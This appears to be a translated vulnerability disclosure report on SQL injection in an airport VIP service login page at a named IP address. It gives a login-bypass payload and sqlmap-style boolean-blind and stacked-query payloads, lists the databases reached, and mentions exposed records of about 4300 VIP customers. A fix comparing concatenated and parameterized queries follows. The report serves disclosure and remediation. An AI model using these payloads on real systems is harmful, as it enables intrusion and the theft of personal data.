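2015-12-13: Details reported to the vendor; awaiting vendor handling
2015-12-18: Vendor confirmed; details disclosed only to the vendor
2015-12-28: Details disclosed to core white hats and experts in related fields
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public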
It's always your own teammates who get you into trouble
Airport VIP service system
http://122.224.232.58/
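The password field is injectable; entering 'or'1'='1 logs in to the admin back end.
4300 VIP customer records, including ID card information, VIP card numbers and some phone numbers.
There is also information on some foreign nationals.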
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTEwNTcyMzk5NDlkZF/LZvLAQjtS8uqCBUouxYjTs1cG/kFoai8qmM7rpj/g&__EVENTVALIDATION=/wEdAARcNpmthiToDsE3afuF/NB1LrflLbaTF4+IO/P7y1Lo5aM0Xx7nPFLadUCblB4PktOinihG6d/Xh3PZm3b5AoMQrdcB3FsoRQ7zEDa3y4b8b6lUEIiLRoGPb1qRWoaAtws=&uid=admin&upwd='or'1'='1' AND 2791=2791 AND 'NyPK'='NyPK&btnLogin=LOGIN

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTEwNTcyMzk5NDlkZF/LZvLAQjtS8uqCBUouxYjTs1cG/kFoai8qmM7rpj/g&__EVENTVALIDATION=/wEdAARcNpmthiToDsE3afuF/NB1LrflLbaTF4+IO/P7y1Lo5aM0Xx7nPFLadUCblB4PktOinihG6d/Xh3PZm3b5AoMQrdcB3FsoRQ7zEDa3y4b8b6lUEIiLRoGPb1qRWoaAtws=&uid=admin&upwd='or'1'='1';WAITFOR DELAY '0:0:5'--&btnLogin=LOGIN
---
[23:35:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
DBA privileges
Database information
available databases [7]:
[*] AirVIP
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

Database: AirVIP
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| dbo.VIP消费流水表 | 4686    |
| dbo.VIP客户信息   | 4305    |
| dbo.module        | 8       |
| dbo.users         | 4       |
+-------------------+---------+
Filter the parameters, and check the other parameters carefully as well; there are probably more.
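The login bypass reported above, reduced to a runnable sketch with the concatenated query beside a parameterized one. This is an added example, not code from the affected site or the original report: the query shape, the `users` schema and the stored password are assumptions, and SQLite stands in for the SQL Server back end.

```python
import sqlite3

def make_db():
    # Constructed sample data. Column names follow the uid/upwd form fields
    # in the captured request; the schema itself is an assumption.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid TEXT PRIMARY KEY, upwd TEXT NOT NULL)")
    # Plaintext only to keep the focus on the query; store a salted hash.
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret-constructed')")
    return db

def login_concatenated(db, uid, upwd):
    # Assumed "before" form: form values are spliced into the SQL text, so a
    # quote in upwd ends the string literal and the rest is parsed as SQL.
    sql = "SELECT uid FROM users WHERE uid='" + uid + "' AND upwd='" + upwd + "'"
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, uid, upwd):
    # Hardened form: the statement text is fixed and the values are bound,
    # so the driver never parses them as SQL.
    sql = "SELECT uid FROM users WHERE uid = ? AND upwd = ?"
    return db.execute(sql, (uid, upwd)).fetchone() is not None

def compare(db, uid, upwd):
    # Returns (concatenated_result, parameterized_result); a SQL syntax error
    # caused by the input is reported as the string "error".
    try:
        weak = login_concatenated(db, uid, upwd)
    except sqlite3.OperationalError:
        weak = "error"
    return weak, login_parameterized(db, uid, upwd)

if __name__ == "__main__":
    db = make_db()
    for pw in ["S3cret-constructed", "wrong", "'or'1'='1", "o'brien"]:
        print(repr(pw), compare(db, "admin", pw))
```

On the ASP.NET and SQL Server stack identified in the tool output, the equivalent of the bound form is a SqlCommand whose values are passed as SqlParameter objects.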
Severity: Low
Vulnerability Rank: 3
Confirmed: 2015-12-18 08:33
A site set up privately by an individual employee; not official activity.
None yet